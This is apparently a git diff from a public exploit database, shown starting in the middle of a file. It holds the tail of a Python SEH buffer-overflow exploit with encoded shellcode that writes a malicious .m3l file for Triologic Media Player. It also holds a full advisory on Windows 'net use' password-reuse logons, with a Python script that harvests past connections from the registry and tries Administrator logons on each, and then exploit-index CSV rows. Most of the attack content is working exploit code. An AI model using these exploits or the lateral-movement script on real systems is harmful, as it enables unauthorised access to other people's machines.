buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
buf += b"\x75\x4d\x30\x41\x41"
nseh = "\x71\x41"
seh = "\x41\x4a"
alignment = ""
alignment += "\x54\x71" # push ebx, padding
alignment += "\x58\x71" # pop eax, padding
alignment += "\x05\x20\x22" # add eax, 0x22002000
alignment += "\x71" # Padding
alignment += "\x2D\x19\x22" # sub eax, 0x22001900
alignment += "\x71" # Padding
alignment += "\x50\x71" # push eax, padding
alignment += "\xC3" # retn
buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()

313
exploits/windows/local/48299.txt Normal file
View file

@ -0,0 +1,313 @@
# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
# Date: 2020-04-04
# Author: hyp3rlinx
# Vendor: www.microsoft.com
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows "net use" Command
Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.
[Vulnerability Type]
Insuffient Password Prompt
[CVE Reference]
N/A
[Security Issue]
The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately
we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to
has other vulnerabilities present.
In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected.
The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation.
Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less.
Requirements:
1) Remote system built-in Administrator account is enabled
2) Origination system users account password and the remote system Administrator passwords match (reuse).
Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case.
Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.
However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails.
Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.
Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections
and try them and if theres password reuse (likely) BOOM automagic logon.
This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used.
When testing make sure to logout then log back in after changing passwords so the environment is clean.
e.g.
1) Passwords for both systems are different and remote built-in Administrator account active:
C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
Enter the password for 'Administrator' to connect to '192.168.x.x':
System error 5 has occurred.
Access is denied.
2) Passwords for both origination system and remote match:
C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
The command completed successfully.
By the way as a side note DCERPC calls work as well, if both systems happen to have same password.
c:\>getmac /s x.x.x.x /U Administrator
MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."
Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?
Expected result: Consistent password dialog box, no matter if passwords match or not.
Actual Result: No prompt for a password if both systems passwords are the same.
Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC.
[Exploit/POC]
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process
#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#-----------------------------------
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#-----------------------------------------------------------
BANNER="""
_ ______________ ___ ____ __ _______ ______
/ | / / ____/_ __/ / | / __ )/ / / / ___// ____/
/ |/ / __/ / / / /| | / __ / / / /\__ \/ __/
/ /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___
/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/
By Hyp3rlinx
ApparitionSec
"""
DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s"
VULN_FOUND=set()
DELAY=2 #Any lower and we may get inaccurate results.
rdp_server_lst=[]
#Return prior network logons to remote systems.
def mountpoints2():
mntpoint2_connections=[]
try:
p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
except Exception as e:
print("[!] "+str(e))
return False
for x in tmp:
idx = x.find("##")
clean = x[idx:]
idx2 = clean.rfind("#")
ip = clean[2:idx2]
ip = re.sub(r"#.*[A-Z,a-z]","",ip)
if ip not in mntpoint2_connections:
mntpoint2_connections.append(ip)
mntpoint2_connections = list(filter(None, mntpoint2_connections))
p.kill()
return mntpoint2_connections
#Terminal server client stores remote server connections.
def rdp_svrs():
global rdp_server_lst
try:
p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
for key in tmp:
if key.find("Servers")!=-1:
pos = key.rfind("\\")
srv = key[pos + 1:].replace("\r\n","").strip()
rdp_server_lst.append(srv)
p.kill()
except Exception as e:
print("[!] "+str(e))
return False
return True
#Disconnect
def del_vuln_connection(ip):
try:
print("[!] Disconnecting vuln network logon connection.\n")
call(r"net use "+DRIVE+":"+" /del")
except Exception as e:
print("[!] "+str(e))
#Check connection
def chk_connection(ip):
print("[+] Testing: "+ip)
sys.stdout.flush()
cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
stderr, stdout = cmd.communicate()
if "Reply from" in stderr and "Destination host unreachable" not in stderr:
print("[*] Target up!")
return True
else:
print("[!] Target unreachable :(")
return False
#Test vuln
def Test_Password_Reuse(ip):
print("[+] Testing "+ip + " the builtin Administrator account.\n")
sys.stdout.flush()
try:
p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
err = p.stderr.readlines()
if err:
e = str(err)
if e.find("error 53")!=-1:
print("[*] Network path not found\n")
return
elif e.find("error 1219")!=-1:
print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
return
elif e.find("error 85")!=-1:
print("[*] The local device name is already in use.\n")
return
else:
print(e+"\n")
tmp = p.stdout.read()
if FINDME in tmp:
print("[*] Password reuse for the built-in Administrator found!")
print("[+] Connected to target: "+ ip)
VULN_FOUND.add(ip+":Administrator")
del_vuln_connection(ip)
p.kill()
except Exception as e:
print("[!] "+str(e))
#Authenticate
def auth(ip):
action_process = Process(target=Test_Password_Reuse, args=(ip,))
action_process.start()
action_process.join(timeout=5)
action_process.terminate()
if __name__ == "__main__":
print(BANNER)
print("[+] Windows 'net use' Network Logon Type-3")
print("[+] Insufficient Password Prompt")
print("[+] By hyp3rlinx\n")
time.sleep(3)
print("[+] Deleting any existing network logons to start clean.")
#Make sure no exist sessions already exist.
call(r"net use * /del /y")
sys.stdout.flush()
time.sleep(1)
#Grab previous connections from MountPoints2 if any.
rdp_svrs()
svrlst=mountpoints2()
if svrlst:
svrlst + rdp_server_lst
else:
svrlst = rdp_server_lst
if not svrlst:
print("[*] No MountPoints2 artifacts found, enter an IP.")
sys.stdout.flush()
ip=raw_input("[+] Target IP> ")
if chk_connection(ip):
auth(ip)
else:
#We have MountPoints2 or RDP Server list IP we can try.
for ip in svrlst:
if chk_connection(ip):
auth(ip)
time.sleep(DELAY)
if len(VULN_FOUND) != 0:
print("[*] Located the following vulnerable systems:")
sys.stdout.flush()
for v in VULN_FOUND:
print("[+] "+v)
else:
print("[+] All previous attempts failed, enter an IP and give it a shot!.")
sys.stdout.flush()
ip=raw_input("[+] Target IP> ")
if chk_connection(ip):
auth(ip)
[POC Video URL]
https://www.youtube.com/watch?v=Je93Neb0k8g
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: February 28, 2020
MSRC "behavior you are reporting is by design" : March 30, 2020
April 5, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

17
files_exploits.csv
View file

@ -6692,6 +6692,14 @@ id,file,description,date,author,type,platform,port
48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows, 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows, 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows, 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11011,6 +11019,9 @@ id,file,description,date,author,type,platform,port
48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows, 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows, 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows, 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42526,3 +42537,9 @@ id,file,description,date,author,type,platform,port
48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,
48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php,
48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,

Can't render this file because it is too large.